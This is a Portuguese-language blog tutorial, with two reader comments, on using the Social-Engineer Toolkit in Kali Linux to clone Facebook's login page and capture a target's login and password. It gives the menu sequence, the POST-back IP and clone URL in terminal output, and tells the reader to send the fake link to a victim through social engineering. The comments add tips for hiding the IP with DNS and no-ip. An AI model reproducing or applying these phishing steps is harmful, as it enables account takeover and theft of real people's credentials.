Neste tutorial irei ensinar como clonar a página do facebook de forma que seja possível capturar a senha e login do alvo digitados na página fake.
Bom, neste tutorial irei utilizar o setookit que vem pré-instalado no Kali, mas caso não possua ele, pode obtê-lo clicando aqui.
Sem mais delongas, vamos lá.
Abra o terminal do Kali e digite setoolkit
root@kali:~# setoolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update…
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart
_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/
[—] The Social-Engineer Toolkit (SET) [—]
[—] Created by: David Kennedy (ReL1K) [—]
[—] Version: 4.3.9 [—]
[—] Codename: ‘Turbulence’ [—]
[—] Follow us on Twitter: @trustedsec [—]
[—] Follow me on Twitter: @dave_rel1k [—]
[—] Homepage: https://www.trustedsec.com [—]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
Depois de abrir esta janela você verá que o set lhe dará várias opções, digite 1 pra escolher a primeira, Social-Engineering Attacks.
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
Depois de definir a primeira opção, no seguinte menu escolha a número 2, Website Attack Vectors, este módulo é uma maneira original de usar múltiplos métodos para ataques web, afim de comprometer o alvo através do navegador. 1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
Na tela acima, selecione a opção número 3, Credential Harvester Attack Method, este método é o método padrão do setoolkit, onde não irá utilizar nenhum programa como extensão pra exploração do navegador ( como o Metasploit ).
1) Web Templates
2) Site Cloner
3) Custom Import
Na tela acima, você verá 3 opções, a primeira seleciona templates de páginas de login nativas que já vem junto com o set, a segunda faz com que o set clone automaticamente a página de login do website pretendido, e a terceira deixa o usuário definir uma página fake criada por ele mesmo. Seleciona a número 2.
Nesta próxima parte muita gente se atrapalha, vou explicar uma coisa, em primeiro lugar, o seu alvo está na mesma rede que você ou não? caso ele esteja, você utilizará seu ip interno nesta próxima etapa, caso ele não esteja, você terá que utilizar seu ip externo e liberar a porta que será utilizado no firewall do seu computador e do seu roteador.
No próximo passo ele irá perguntar qual página desejamos clona, no caso iremos selecionar o domínio do facebook, mas funcionaria com qualquer outra página de login.
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/
Depois disso o setoolkit lhe dará o link, onde a página falsa de login ficou hospedada na sua rede exibida pelo seu endereço ip, ao enviar para a vítima utilizando algum método de engenharia social, ela irá abrir o link e seu navegador e se deparar com a página falsa.Onde ao logar com seu usuário e senha os dados serão enviados para sua sessão no setoolkit atravéz do terminal do Kali.DEMONSTRAÇÃO
Página de login gerada pelo Setoolkit:
Dados recebidos com êxito:
mas ninguem vai acessar com esse numero de IP tem q mascarar e fazer um DNS.....
ResponderExcluirvi esse video e consegui fazer no windows e com no-ip
ResponderExcluirhttps://www.youtube.com/watch?v=leusrkObZc0